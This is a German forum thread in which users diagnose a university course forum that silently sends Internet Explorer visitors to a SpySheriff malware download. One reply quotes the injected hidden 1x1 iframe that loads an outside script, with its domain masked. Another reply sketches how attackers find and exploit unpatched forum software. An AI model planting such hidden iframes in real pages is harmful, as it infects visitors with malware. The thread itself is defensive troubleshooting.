Curnen: Automatische Weiterleitung zu Malware im Forum

SELF-Forum

Automatische Weiterleitung zu Malware im Forum

Curnen
Informationen zu den Bewertungsregeln

Hallo zusammen,

Seit knapp zwei Tagen haben wir mit dem Forum unseres Studienganges Molekulare Biomedizin der Uni Bonn  http://www.molbiomedforum.de.vu/ bzw. http://mbmforum.tecshells.de/ib/index.php das Problem, dass Nutzer des Internetexplorers (vorzugsweise ältere Versionen), die zudem keine oder nur unzureichenden Firewallschutz haben, bei dem Besuch der Seite durch eine automatische Weiterleitung auf einen Server weitergeleitet werden, von dem sich u.a. Malware Spysherrif installiert.

[Screenshots dazu finden sich unter http://www.pinguine.net/mbmforum/mallink1.jpg  http://www.pinguine.net/mbmforum/mallink2.jpg]

Das Ganze wäre eigentlich nicht weiter verwunderlich, wenn es sich um irgendeine Webseite von einem ominösen Anbieter handeln würde. Aber zu unseren Forenadministratoren habe ich vollstes Vertrauen und Sie sagen, im Quelltext des Forums ließe sich nichts außergewöhnliches feststellen. Zudem lässt sich die Seite mit Firefox noch problemlos besuchen.

Meine Frage daher: Wie könnte man einen solchen automatischen Link in die Verbindung reinmogeln, der nicht im Quelltext zu sehen ist und zudem scheinbar nur vom Internetexplorer interpretiert wird.

Mit freundlichen Grüßen

Curnen

Beitrag melden
Informationen zu den Bewertungsregeln

  1. Automatische Weiterleitung zu Malware im Forum

    Curnen
    Informationen zu den Bewertungsregeln

    Sorry,

    Hat sich eigentlich erledigt. Den <iframe> am Ende haben irgendwie alle übersehen...wer den allerdings reingemacht hat, weiß ich nicht.

    Gruß

    Curnen

    Beitrag melden
    Informationen zu den Bewertungsregeln

    1. Automatische Weiterleitung zu Malware im Forum

      Cybaer Homepage des Autors
      Informationen zu den Bewertungsregeln

      Hi,

      Hat sich eigentlich erledigt. Den <iframe> am Ende haben irgendwie alle übersehen...wer den allerdings reingemacht hat, weiß ich nicht.

      Man schaue sich an, welche Software in welcher Version benutzt wird (ggf. googelt man auch einfach, um seine Opfer zu finden), googelt dann nach Exploits für diese Version und wende sie an.

      Das funktioniert so toll, weil die Betreiber so (grob) fahrlässig vorhandene Sicherheitsupdates nicht einspielen ...

      Gruß, Cybaer

      --
      Hinweis an Fragesteller: Fremde haben ihre Freizeit geopfert, um Dir zu helfen. Helfe Du auch im Archiv Suchenden: Beende deinen Thread mit einem "Hat geholfen" oder "Hat nicht geholfen"!
      Beitrag melden
      Informationen zu den Bewertungsregeln

  2. Automatische Weiterleitung zu Malware im Forum

    Siechfred Homepage des Autors
    +1 Informationen zu den Bewertungsregeln

    Hell-O!

    Meine Frage daher: Wie könnte man einen solchen automatischen Link in die Verbindung reinmogeln, der nicht im Quelltext zu sehen ist und zudem scheinbar nur vom Internetexplorer interpretiert wird.

    Ganz sicher ist das hier ganz unten im Quelltext nicht beabsichtigt (URL unkenntlich gemacht, schaut halt selber nach):

    <iframe src="http://xxxxxxxxxx.yyy/dl/adv606.php" width=1 height=1></iframe>

    Scheint eine Sicherheitslücke in der verwendeten Forensoftware zu sein (siehe Google-Suche). Wenn ich das richtig sehe, solltet ihr die Software dringend aktualisieren, die entsprechende Seite des Anbieters strotzt nur so vor Security-Updates.

    Siechfred

    --
    Hier könnte Ihre Werbung stehen.
    Das Steuer-Blog | Siechfreds Tagebuch
    Beitrag melden
    +1
    Informationen zu den Bewertungsregeln

  3. Automatische Weiterleitung zu Malware im Forum

    Der Martin
    Informationen zu den Bewertungsregeln

    Hallo,

    [...] dass Nutzer des Internetexplorers (vorzugsweise ältere Versionen), die zudem keine oder nur unzureichenden Firewallschutz haben, bei dem Besuch der Seite durch eine automatische Weiterleitung auf einen Server weitergeleitet werden, von dem sich u.a. Malware Spysherrif installiert.

    ach tatsächlich? Ich hab's gerade mit IE6 und IE5.5 ausprobiert - nichts passiert. Weder eine Weiterleitung, noch sonst irgendwas Auffälliges.

    Screenshots dazu finden sich unter http://www.pinguine.net/mbmforum/mallink1.jpg

    Naja, dass euer Forum ein Cookie ablegen will, ist ja mal nicht weiter schlimm (aber unnötig); wer das nicht will, kann es ja ablehnen.

    und http://www.pinguine.net/mbmforum/mallink2.jpg

    Das deutet auf das Problem mit WMF-Grafiken hin, bei denen vor ein paar Monaten eine böse Sicherheitslücke entdeckt wurde. Ich selbst kann das zwar nicht nachvollziehen, weil ich auf meinen Rechnern keine Software habe, die WMF-Grafiken anzeigen kann und mir demzufolge diese Dateien zum Speichern angeboten werden (bzw. mein IE zeigt mir stattdessen ein rotes Kreuzchen für "Bild nicht verfügbar") - aber das ist ja nicht bei jedem so.

    Sei's drum - was das für eine Weiterleitung sein soll, kann ich auch nach einem Blick in euren Quelltext nicht nachvollziehen. Oder hat da jemand Javascript aktiviert und vertraut blindlings allem, was ihm da vor die Flinte kommt?  ;-)

    Das Ganze wäre eigentlich nicht weiter verwunderlich, wenn es sich um irgendeine Webseite von einem ominösen Anbieter handeln würde. Aber zu unseren Forenadministratoren habe ich vollstes Vertrauen und Sie sagen, im Quelltext des Forums ließe sich nichts außergewöhnliches feststellen. Zudem lässt sich die Seite mit Firefox noch problemlos besuchen.

    Wie gesagt, mit meinen IEs finde ich da auch kein Problem ...

    So long,
     Martin

    --
    Wenn du beim Kochen etwas heißes Wasser übrig hast, friere es ein.
    Heißes Wasser kann man immer gebrauchen.
    Beitrag melden
    Informationen zu den Bewertungsregeln